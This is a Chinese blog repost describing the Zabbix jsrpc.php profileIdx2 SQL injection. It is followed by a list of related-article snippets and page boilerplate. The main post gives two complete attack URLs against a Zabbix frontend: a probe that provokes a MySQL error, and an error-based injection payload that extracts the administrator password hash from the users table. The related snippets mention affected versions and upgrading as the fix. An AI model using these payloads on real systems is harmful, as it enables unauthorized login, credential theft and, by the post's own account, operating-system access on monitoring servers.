zabbix前台jsrpc注入

最新推荐文章于 2023-02-05 10:42:09 发布
最新推荐文章于 2023-02-05 10:42:09 发布
阅读量163 收藏
点赞数
文章标签: 运维 php
原文链接:http://www.cnblogs.com/nayu/p/5830804.html
版权

zabbix是一个开源的企业级性能监控解决方案。

官方网站:http://www.zabbix.com

zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

首先打开登录页面 检测是否可以guest登录。
然后xx.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
如出现mysql报错提示,则表示存在该sql注入漏洞。
 
获取密码hash:
xx.com/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2%20&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph%20&profileIdx2=(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,(select%20passwd%20from%20users%20limit%200,1),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297%20&action=showlatest&filter=&filter_task=&mark_color=1
 
 

转载于:https://www.cnblogs.com/nayu/p/5830804.html

weixin_30755709
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zabbix jsrpc.php,Zabbix SQL(jsrpc.php) 注入漏洞分析 (以3.0.2为例)
weixin_28993705的博客
03-10 666
近日,Zabbix的web后台爆出一个sql注入漏洞。青藤云安全团队立即响应,并提出了临时&最佳解决方案。0x00 漏洞概述漏洞类型:SQL 注入危险等级:高利用条件:该漏洞需要登录,但是系统内置Guest帐号且默认为启用状态。受影响参数:profileIdx20x01POC测试http://xxx.testzabbix.com/zabbix/jsrpc.php?sid=0bcd4ad...
ZABBIX jsrpc SQL注入
打代码的小女孩
11-17 792
影响的版本 ZABBIX 2.0.5 2.0.13 2.2.x 2.4.2 2.4.5 2.4.7 2.4.8 2.5.0 3.0.0-3.0.3。 不受影响的版本 ZABBIX 1.8.*,2.2.14,3.0.4,3.2.0。 修复方法 官方已经发布了新版本修复了此安全问题,请尽快升级到最新版本。官方下载地址如下: http://www.zabbix.com/dow...
zabbix jsrpc.php,Vulnhub-zabbix latest.php SQL注入漏洞(CVE-2016-10134)
weixin_35599225的博客
03-10 295
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。(引用)2016年8月12日,1n3通过邮件披露了Zabbix软件的jsrpc.php文件在处理profileIdx2参数时存在insert方式的SQL注入漏洞,与官方通告的late...
Zabbix latest.php Insert注入分析与实践
乐枕的家
08-22 2539
概要因为未能过滤掉latest.php页面中toggle_ids数组的输入,导致Zabbix 2.2.x,3.0.x 远程SQL注入源码分析下载了两份官方代码对比,左为3.0.4(已修复的版本),右为3.0.3\zabbix-3.0.3rc1\frontends\php\jsrpc.php可见新版本中删除的代码即为漏洞触发部分。 /* * Ajax */ if (hasRequest('favo
Python爬虫之Js逆向案例(13)-某乎最新x-zse-96的rpc方案后续
玛卡`三少 的博客
11-02 2181
jsrpc的原理是利用websocket通信技术实现的通过调用socket服务,通知放在浏览器端的socket执行相关代码,拿到结果后客户端发送给服务器,然后再返回给接口调用者技术(个人理解,不一定很准确),说白了就是websocket的具体应用罢了!
zabbix注入利用工具
01-03
zabbix注入利用工具,超级好用了,常用的安全测试工具
Zabbix6.0中文手册
04-13
Zabbix 6.0 中文手册 Zabbix 是一个企业级的监控解决方案,提供了强大的监控和自动化功能。以下是 Zabbix 6.0 中文手册的知识点总结: 1. 简介:Zabbix 是一个基于 Web 的网络监控系统,可以监控各种网络设备和...
zabbix6.4.6
08-30
搭配centos7安装zabbix 感谢帖子https://blog.csdn.net/weixin_50877409/article/details/124295941
zabbix监控山石防火墙
06-05
山石系列zabbix监控模板
scrapy-jsonrpc, Scrapy对使用 JSON RPC控制spider的扩展.zip
09-18
scrapy-jsonrpc, Scrapy对使用 JSON RPC控制spider的扩展 爬虫 jsonrpcScrapy jsonrpc是一个扩展,通过 json rpc控制一个正在运行的爬虫网络爬虫。 服务通过协议提供对Crawler对象的访问。安装使用 pip 安装 scrapy-jsonrpc:$ pip
js逆向:rpc远程调用
快乐的大大大飞猪
10-08 1470
2.js本地替换,先下断点测试一下,然后右键js代码保存以备替代,最后单独测试一下,如果下断点没走,说明断点没找对,建议用alert()测试一下。1.一般来说开启的顺序是,服务端python代码,然后是浏览器中的js代码(调试一下),最后可以按照客户端模式调用rpc加密接口。值得注意的一点是,需要替换到本地注入js代码。例子:这里用rsa加密为例。
JS RPC-sekiro直接得到加密参数结果进行爬虫(同花顺)
Hamsung
02-05 959
JS RPC-sekiro直接得到加密参数结果进行爬虫(同花顺)
zabbix jsrpc.php,Zabbix API的介绍及使用
weixin_29988907的博客
03-10 612
Zabbix API的介绍及使用发布时间:2018-06-29 11:41,浏览次数:665, 标签:ZabbixAPIzabbix拥有完善的API,基于JSONRPC提供资产,主机,主机组,监控项,告警等方面的接口。在做运维自动化时,需要用API功能对zabbix二次开发。本文我将介绍如何用python信使用zabbix的API。API介绍*API地址, http://你的zabbix域名/ap...
如何查看zabbixphp应用报错,zabbix监控报错zabbix server is not running: the information displayed may not be curr...
weixin_34644072的博客
03-20 181
这几天为了做监控在ubuntu服务器上部署了zabbix做监控。过程还是遇到了一些问题,把他记录下来。希望对大家有帮助吧。这里千万记住,zabbix 不建议用最新版本,唉~~~~找个稍微次级版本即可。这次安装过程过程出现了报错:zabbix红色弹出报错:zabbix server is not running: the information displayed may not be curren...
Zabbix JSON-RPC
781193278专栏
12-01 4421
1 Zabbix概述 1) 是一个企业级的分布式开源监控方案 2) 是一个高度集成的网络监控解决方案 3) 是一款能够监控各种网络参数以及服务器健康性和完整性的软件 2 常用名词解释 1) 主机(host):一台你想监控的网络设备,用IP或域名表示 2) 监控项(item):你想要接收的主机的特定数据,一个度量数据 3) Zabbix Server:实现监控的核心
Zabbix API通过JSON RPC协议来获取历史数据。
chenmx93的博客
09-29 2673
Zabbix API可以通过JSON RPC协议来获取历史数据。 可以采用脚本或者任何支持JSON RPC的工具来使用API。 基本请求格式 Zabbix API 简化的JSON请求如下: { "jsonrpc": "2.0", "method": "method.name", "params": { "param_1_name": "param_1_value",...
RPC 技术及其框架 Sekiro 在爬虫逆向中的应用,加密数据一把梭
K哥爬虫
02-22 5229
爬虫界神器,RPC 技术及其框架 Sekiro 的应用实战。
python爬虫逆向工具之jsrpc
weixin_43459158的博客
01-17 3694
js rpc 顾名思义,就是远程调用js代码。 优点:可以让我们直接调用浏览器环境下的js加密或解密函数,免去了扣加密逻辑的时间,和避免很多本地用node去执行js所出现的各种问题,比如说环境缺失等问题 缺点:必须开着浏览器 欢迎大佬们关注公众号 准备工作 WebSocket 想要远程调用浏览器里的js,那最先要解决的就是怎么通讯的问题,这里最合适的协议是WebSocket。 可以自己写一个,也可以用现成的工具,比如:https://github.com/jxhczhl/JsRpc,这个是用go语言写的,
zabbix5.0数据迁移zabbix6.0
最新发布
11-17
以下是将zabbix5.0数据迁移到zabbix6.0的步骤: 1.备份zabbix5.0数据库 在迁移之前,首先需要备份zabbix5.0的数据库。可以使用以下命令备份: ```shell mysqldump -u root -p zabbix > zabbix_backup.sql ``` 2....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值